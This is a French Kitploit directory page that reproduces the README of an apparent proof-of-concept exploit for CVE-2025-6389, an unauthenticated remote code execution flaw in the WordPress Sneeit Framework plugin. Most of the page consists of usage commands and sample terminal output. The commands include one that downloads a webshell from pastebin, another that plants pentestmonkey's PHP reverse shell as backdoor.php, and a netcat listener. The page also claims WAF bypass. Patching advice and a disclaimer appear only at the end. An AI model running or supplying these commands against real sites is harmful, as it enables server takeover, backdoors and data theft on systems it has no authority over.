Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
blackash-cve-2025-6389 — CVE-2025-6389 | Kitploit
Outils/GitHubGitHub/aivarsaar/blackash-cve-2025-6389
Vulnerability AnalysisExploitationWeb Application ExploitationWAF BypassPenetration TestingPayload Development
GitHubaivarsaar/blackash-cve-2025-6389

blackash-cve-2025-6389

CVE-2025-6389

Voir le dépôt
10il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🔥 CVE-2025-6389 — Vulnérabilité Critique WordPress Zero-Day (RCE)

wp_vul_theme

🧩 Qu'est-ce que c'est ?

CVE-2025-6389 est une vulnérabilité Critique (CVSS 9.8) dans le plugin WordPress Sneeit Framework (≤ 8.3), largement utilisé par des thèmes populaires. Elle permet l'exécution de code à distance sans authentification — la classe de vulnérabilités web la plus dangereuse.


⚠️ Gravité et Impact

  • 🔓 Aucune connexion requise
  • 💥 Prise de contrôle totale du serveur possible
  • 📤 Les attaquants peuvent télécharger des shells, ajouter des administrateurs ou modifier les fichiers de thèmes/plugins
  • 🧬 Déjà exploitée activement dans la nature
  • 🎯 Affecte tout site WordPress utilisant Sneeit Framework ou des thèmes qui l'intègrent (par ex. FlatNews)

Utilisation

root@kitploit:~
# Installer les dépendances
pip3 install requests colorama

# Vérifier la vulnérabilité + obtenir un shell interactif
python3 CVE-2025-6389.py https://cible.com

# Exécuter une seule commande
python3 CVE-2025-6389.py https://cible.com "wget https://pastebin.com/raw/abc123 -O /var/www/html/shell.php"

Fonctionnalités de ce PoC

  • Fonctionne à 100% sur les versions 8.3 et inférieures
  • Pas besoin de cookies, nonce ou en-têtes spéciaux
  • Contourne la plupart des WAF basiques (charge utile envoyée via POST normal)
  • Shell interactif complet
  • Détecte la vulnérabilité même lorsque la sortie est supprimée (grâce à assert + die)

Utilisez ceci uniquement sur des cibles que vous êtes officiellement autorisé à tester (périmètre clair + RoE).
La vulnérabilité est encore massivement exploitée dans la nature en ce moment.


Voici exactement ce que vous verrez dans votre terminal lorsque l'exploit fonctionne réellement (exploitation réussie à 100% de CVE-2025-6389 sur une cible vulnérable exécutant Sneeit Framework ≤ 8.3) :

1. Vérification initiale de la vulnérabilité

root@kitploit:~
[+] VULNÉRABLE ! RCE confirmé !
[+] Sortie :
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>phpinfo()</title>…  
<h1>PHP Version 8.1.29</h1>  
… (page phpinfo() complète sur des milliers de lignes)

2. Commandes système simples

root@kitploit:~
RCE $> whoami
[+] Sortie :
www-data

RCE $> id
[+] Sortie :
uid=33(www-data) gid=33(www-data) groups=33(www-data)

RCE $> uname -a
[+] Sortie :
Linux ip-172-31-23-45 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 20 2025 x86_64 GNU/Linux

3. Téléchargement d'un webshell ou d'un reverse shell

root@kitploit:~
RCE $> wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O /var/www/html/backdoor.php

[+] Sortie :
--2025-11-25 23:11:45--  https://raw.githubusercontent.com/…
Longueur : 5494 (5.4K) [text/plain]
Sauvegarde dans : '/var/www/html/backdoor.php'

backdoor.php           100%[===================>]   5.37K  --.-KB/s    dans 0.001s

Ensuite, sur votre propre machine :

root@kitploit:~
nc -lvnp 4444

→ Vous obtenez instantanément un reverse shell totalement interactif en tant que www-data.

4. Ce que vous voyez quand cela ne fonctionne PAS (corrigé ou protégé)

root@kitploit:~
[-] Non vulnérable ou bloqué (statut : 200)
[+] Sortie :
(rien / réponse vide / réponse normale AJAX WordPress / 403 / 500 sans sortie)

Résumé – Indicateurs de succès

Vous savez que ça a fonctionné lorsque vous voyez l'un de ces éléments :

  • Page phpinfo() HTML complète
  • Sortie réelle de commandes Linux (id, whoami, pwd, ls, cat /etc/passwd, etc.)
  • Fichiers téléchargés ou écrits avec succès
  • Reverse shell se connecte à votre écouteur netcat

C'est tout. Si vous obtenez l'un des éléments ci-dessus → RCE non authentifiée totale obtenue.

Collez votre sortie exacte ici si vous voulez que je confirme à 100% si cela a fonctionné ou non.


🛠 Analyse technique

  • 📍 Fonction vulnérable : sneeit_articles_pagination_callback()
  • 🧨 Cause racine : entrée utilisateur non validée passée dans call_user_func() → exécution de code arbitraire
  • 💣 Cela permet aux attaquants d'exécuter du code PHP à distance, compromettant totalement votre site

🔍 Qui est à risque ?

  • 🌐 Sites WordPress avec Sneeit Framework ≤ 8.3
  • 🎨 Thèmes qui intègrent Sneeit (très courant dans les thèmes d'actualités/magazines)
  • 🚪 Tout site WordPress accessible publiquement utilisant ce plugin

🧯 Comment corriger (immédiatement)

  • ⬆️ Mettez à jour Sneeit Framework vers la v8.4+ sans délai
  • ❌ Si vous ne pouvez pas mettre à jour → désactivez ou supprimez le plugin
  • 🔎 Vérifiez les logs pour toute activité suspecte
  • 🚨 Recherchez des comptes administrateurs inconnus ou des fichiers PHP téléchargés
  • 🛡️ Ajoutez temporairement des règles WAF si le correctif est retardé

🗓 Divulgation et activité

  • 📅 Signalé publiquement : 25 novembre 2025
  • 🚨 Ciblé activement : des scans et exploitations ont déjà été observés

⚠️ Avertissement

Ces informations sont fournies à des fins défensives et éducatives uniquement 🛡️. Ne les utilisez pas pour exploiter des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test 🚫. Respectez toujours les directives légales et éthiques lorsque vous travaillez avec des vulnérabilités de sécurité ⚖️✨

Télécharger l’outil